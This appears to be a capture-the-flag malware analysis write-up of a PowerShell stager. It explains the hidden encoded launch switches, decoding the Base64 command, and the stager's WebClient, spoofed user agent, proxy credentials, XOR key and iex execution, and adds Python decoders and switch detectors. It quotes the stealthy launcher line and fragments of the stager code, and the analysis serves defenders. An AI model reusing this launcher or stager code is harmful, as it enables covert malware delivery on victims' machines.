PowerShell Script
Challenge Description
Solution and Analysis
We have the following powershell code in the malware
powershell.exe -NoP -sta -NonI -W Hidden -Enc
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
The command line powershell.exe -NoP -sta -NonI -W Hidden -Enc launches PowerShell in a stealthy, non-interactive way and hands it a Base64-encoded script. The same switches are used by administrators for unattended automation, so the pattern alone is not conclusive, but the combination of a hidden window, no profile and an encoded command is a staple of malicious droppers and should be treated as suspicious wherever process command lines are logged (Sysmon Event ID 1, or Security Event ID 4688 with command-line auditing enabled).
1. powershell.exe
This launches the PowerShell executable.
It allows execution of PowerShell scripts and commands.
2. -NoP (No Profile)
- Prevents PowerShell from loading the user's profile scripts.
- Makes execution faster and more predictable, and sidesteps anything an administrator has put into the profile (custom aliases, logging hooks, execution-policy wrappers) that could break or expose the script.
- Skips custom startup scripts such as profile.ps1.
3. -sta (Single Threaded Apartment)
- Runs PowerShell in Single-Threaded Apartment mode.
- Required by WPF/WinForms and by some COM objects. Since PowerShell 3.0 the console already defaults to STA, so in a stager this switch is mostly a compatibility holdover copied from older templates.
4. -NonI (Non-Interactive)
- Starts PowerShell in non-interactive mode.
- User cannot type input directly — only automated/scripted commands are executed.
5. -W Hidden (WindowStyle Hidden)
- -W is the short form of -WindowStyle; Hidden runs PowerShell with no visible window.
- Prevents a console from flashing up and alerting the user, although the powershell.exe process is still visible in Task Manager and process telemetry.
6. -Enc (EncodedCommand)
- Specifies that the following argument is a Base64-encoded command. PowerShell expects the bytes under the Base64 to be UTF-16LE text, which is why a raw decode shows a null byte after every character.
- Used to hide the actual script from casual inspection of the command line. It is encoding, not encryption, and PowerShell Script Block Logging (Event ID 4104) records the decoded script regardless.
- Example:
-Enc SQBmACgAMQArADEAKQA... decodes to text beginning If(1+1), i.e. readable PowerShell code.
To decode the first stage, copy only the Base64 blob (not the powershell.exe prefix and switches), paste it into CyberChef, and apply From Base64 followed by Decode text with UTF-16LE; the output is the readable script. If the blob was copied from a log and lost its trailing = padding, add it back before decoding.
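The same decode done offline, as an added example rather than code from the write-up: it pulls the -Enc argument out of a command line, restores missing Base64 padding, and decodes the UTF-16LE text, and it also flags which of the stealth switches above are present. The command line and blob are constructed for the example (the blob is the page's SQBmACgAMQArADEAKQA sample, which is If(1+1)); the challenge's real encoded command is not reproduced.

```python
import base64
import re

# Constructed command line for this example (not the challenge's real blob, which
# is not reproduced here). The Base64 is the page's SQBmACgAMQArADEAKQA sample,
# which is UTF-16LE "If(1+1)" plus its '=' padding.
SAMPLE_CMDLINE = "powershell.exe -NoP -sta -NonI -W Hidden -Enc SQBmACgAMQArADEAKQA="

# -EncodedCommand and the abbreviations PowerShell accepts for it (-e, -ec, -enc).
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

# Switch spellings that, combined, characterise a hidden encoded launcher.
SWITCHES = {
    "noprofile":      re.compile(r"-nop(?:rofile)?\b", re.I),
    "noninteractive": re.compile(r"-noni(?:nteractive)?\b", re.I),
    "hidden":         re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "encodedcommand": ENC_FLAG,
}


def extract_encoded_command(cmdline: str):
    """Return the Base64 argument of -EncodedCommand, or None if absent."""
    m = ENC_FLAG.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(blob: str) -> str:
    """Decode a -EncodedCommand argument: Base64 -> UTF-16LE text.

    This is what CyberChef's 'From Base64' + 'Decode text (UTF-16LE)' does.
    """
    # Blobs copied out of logs and tickets often lose their trailing '='.
    padded = blob + "=" * (-len(blob) % 4)
    raw = base64.b64decode(padded)
    # A blob truncated mid-character leaves a dangling byte; replace rather than crash.
    return raw.decode("utf-16-le", errors="replace")


def decode_from_cmdline(cmdline: str):
    """Pull the -Enc argument out of a full command line and decode it."""
    blob = extract_encoded_command(cmdline)
    return decode_encoded_command(blob) if blob else None


def suspicious_switches(cmdline: str) -> set:
    """Which of the stealth switches discussed above are present."""
    return {name for name, rx in SWITCHES.items() if rx.search(cmdline)}


if __name__ == "__main__":
    print("switches:", sorted(suspicious_switches(SAMPLE_CMDLINE)))
    print("decoded :", decode_from_cmdline(SAMPLE_CMDLINE))
```

Run it over a Sysmon or 4688 export and any line where suspicious_switches returns all four names deserves a look; the decoded text is what you then feed into the behaviour analysis below.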
Malware Behavior Analysis
The provided PowerShell script is a malicious script that performs the following actions:
WebClient Initialization: The script creates a WebClient object with the line $wc = new-object system.net.webclient;. This object is used to make HTTP requests, enabling the script to interact with external servers, likely to download additional payloads or data.
User Agent Spoofing: It sets a spoofed user agent string, $u = 'mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; rv:11.0) like gecko';, which is the genuine string for Internet Explorer 11 on 64-bit Windows 7, and adds it to the HTTP headers with $wc.headers.add('user-agent', $u);. The requests then look like ordinary browsing in proxy logs; the giveaway is that the process making them is powershell.exe, not a browser, which is the kind of mismatch a proxy or EDR correlation rule can catch.
Proxy Configuration: The script points the WebClient at the system's default proxy with $wc.proxy = [system.net.webrequest]::defaultwebproxy; and supplies the logged-on user's Windows credentials for proxy authentication with $wc.proxy.credentials = [system.net.credentialcache]::defaultnetworkcredentials;. This lets the stager work unchanged inside corporate networks where outbound HTTP requires an authenticated proxy.
Payload Obfuscation and Execution: The script uses a repeating-key XOR to obfuscate its second stage. The key is defined as $k = 'im-s&fa9xu{[)|wdwjhc+!n~vq_12lty'; (32 characters) and the payload is decoded with $b = ([char[]]$b) | % { $_ -bxor $k[$i++ % $k.length] };, i.e. each character of $b is XORed with the key character at position $i modulo the key length, so the key repeats every 32 characters. The decoded characters are joined back into a string and executed with iex ($b -join ''). That second stage is where the core malicious functionality lives, typically downloading and executing a further payload, establishing persistence, or exfiltrating data. Because XOR with a known key is its own inverse, the same expression (or CyberChef's XOR recipe with this key) recovers the plaintext.
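The decoding loop reimplemented in Python, as an added example that is not part of the write-up: xor_keystream mirrors $_ -bxor $k[$i++ % $k.length] with the key from the decoded script, and recover_key goes one step further than the page, showing how the key falls out of a known-plaintext prefix if a later sample hides it. The second-stage text used here is constructed; the real payload is not on the page.

```python
# Key as it appears in the decoded first stage.
KEY = 'im-s&fa9xu{[)|wdwjhc+!n~vq_12lty'


def xor_keystream(text: str, key: str = KEY) -> str:
    """Python equivalent of  $b = ([char[]]$b) | % { $_ -bxor $k[$i++ % $k.length] }.

    Character i of the input is XORed with key[i mod len(key)], so the key
    repeats every len(key) characters (32 here). XOR is its own inverse, so
    the same function both obfuscates and deobfuscates.
    """
    return "".join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(text))


def recover_key(cipher: str, known_plain: str) -> str:
    """Known-plaintext attack on the repeating key: if the first len(key)
    characters of the second stage are known or guessable, the key is
    cipher XOR plaintext, position by position."""
    return "".join(chr(ord(c) ^ ord(p)) for c, p in zip(cipher, known_plain))


# Constructed stand-in for the downloaded second stage; the real one is not on the page.
SAMPLE_STAGE2 = "Write-Host 'constructed second-stage sample'; Get-Date"
# What the server would send: the plaintext run through the stager's XOR.
SAMPLE_BLOB = xor_keystream(SAMPLE_STAGE2)


def decode_stage2(blob: str, key: str = KEY) -> str:
    """Reverse the stager's loop; this is the string that iex ($b -join '') would run."""
    return xor_keystream(blob, key)


if __name__ == "__main__":
    print(repr(SAMPLE_BLOB[:16]))          # unreadable on the wire
    print(decode_stage2(SAMPLE_BLOB))      # readable PowerShell
    print(recover_key(SAMPLE_BLOB, SAMPLE_STAGE2[:len(KEY)]) == KEY)
```

With the real sample, replace SAMPLE_BLOB with the string the WebClient fetched and decode_stage2 gives you the script the questions refer to; if a variant carries a different key, a guessed 32-character prefix of the plaintext and recover_key will get you the key without a CyberChef brute force.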
Potential Behavior: The script's structure suggests it is designed to:
- Download a malicious payload from a remote server using the WebClient.
- Execute the downloaded payload or additional commands hidden in the XOR-decoded string.
- Operate covertly by mimicking legitimate browser traffic and handling proxy authentication.
Use the decoded script to answer the questions; every answer is found in the decoded PowerShell itself.